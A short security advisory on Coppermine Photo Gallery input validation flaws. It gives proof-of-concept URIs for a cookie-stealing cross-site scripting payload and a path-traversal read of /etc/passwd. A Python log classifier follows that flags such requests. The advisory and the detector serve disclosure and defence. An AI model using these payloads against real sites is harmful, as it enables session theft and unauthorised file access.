
Coppermine Photo Gallery Multiple Input Validation Vulnerabilities

To exploit the cross-site scripting issue, an attacker must entice an unsuspecting victim into following a malicious URI. An attacker can exploit the local file-include issue through a browser.

The following proof-of-concept URIs are available:

http://www.example.com/cpg/mode.php?admin_mode=1&referer=javascript:alert(document.cookie)
http://localhost/cpg/viewlog.php?log=../../../../../../../../../etc/passwd%00
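
For reviewing web server logs for requests shaped like the two proof-of-concept URIs above, a small classifier can help. This is an added example, not part of the original advisory or of Coppermine itself; the script and parameter names come from the URIs above, while the finding labels, the scheme list and all sample requests except the first two are constructed for illustration.

```python
from urllib.parse import urlsplit, parse_qs

# Constructed request targets; the first two mirror the advisory's
# proof-of-concept URIs, the rest are made-up benign or variant cases.
SAMPLE_REQUESTS = [
    "/cpg/mode.php?admin_mode=1&referer=javascript:alert(document.cookie)",
    "/cpg/viewlog.php?log=../../../../../../../../../etc/passwd%00",
    "/cpg/mode.php?admin_mode=1&referer=index.php",
    "/cpg/viewlog.php?log=security",
    "/cpg/mode.php?admin_mode=0&referer=%20JaVaScRiPt%3Aalert(1)",
    "/cpg/viewlog.php?log=..%2f..%2fetc%2fpasswd",
]

# Assumed list of script-capable schemes worth flagging in a redirect target.
SCRIPT_SCHEMES = {"javascript", "vbscript", "data"}

def has_script_scheme(value):
    """True if the decoded value starts with a script-capable URI scheme."""
    # Drop whitespace/control characters so padding cannot hide the scheme.
    cleaned = "".join(ch for ch in value if ch > " ").lower()
    scheme, sep, _ = cleaned.partition(":")
    return bool(sep) and scheme in SCRIPT_SCHEMES

def classify(request_target):
    """Return finding labels for one request target taken from an access log."""
    parts = urlsplit(request_target)
    script = parts.path.rsplit("/", 1)[-1].lower()
    # parse_qs percent-decodes values, so %00 and %2f are seen decoded.
    params = parse_qs(parts.query, keep_blank_values=True)
    findings = []
    if script == "mode.php":
        if any(has_script_scheme(v) for v in params.get("referer", [])):
            findings.append("xss-referer-scheme")
    elif script == "viewlog.php":
        for value in params.get("log", []):
            if "\x00" in value:
                findings.append("lfi-null-byte")
            if ".." in value.replace("\\", "/").split("/"):
                findings.append("lfi-traversal")
    return findings

if __name__ == "__main__":
    for target in SAMPLE_REQUESTS:
        print(classify(target) or ["clean"], target)
```
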







 

Copyright 2009, SecurityFocus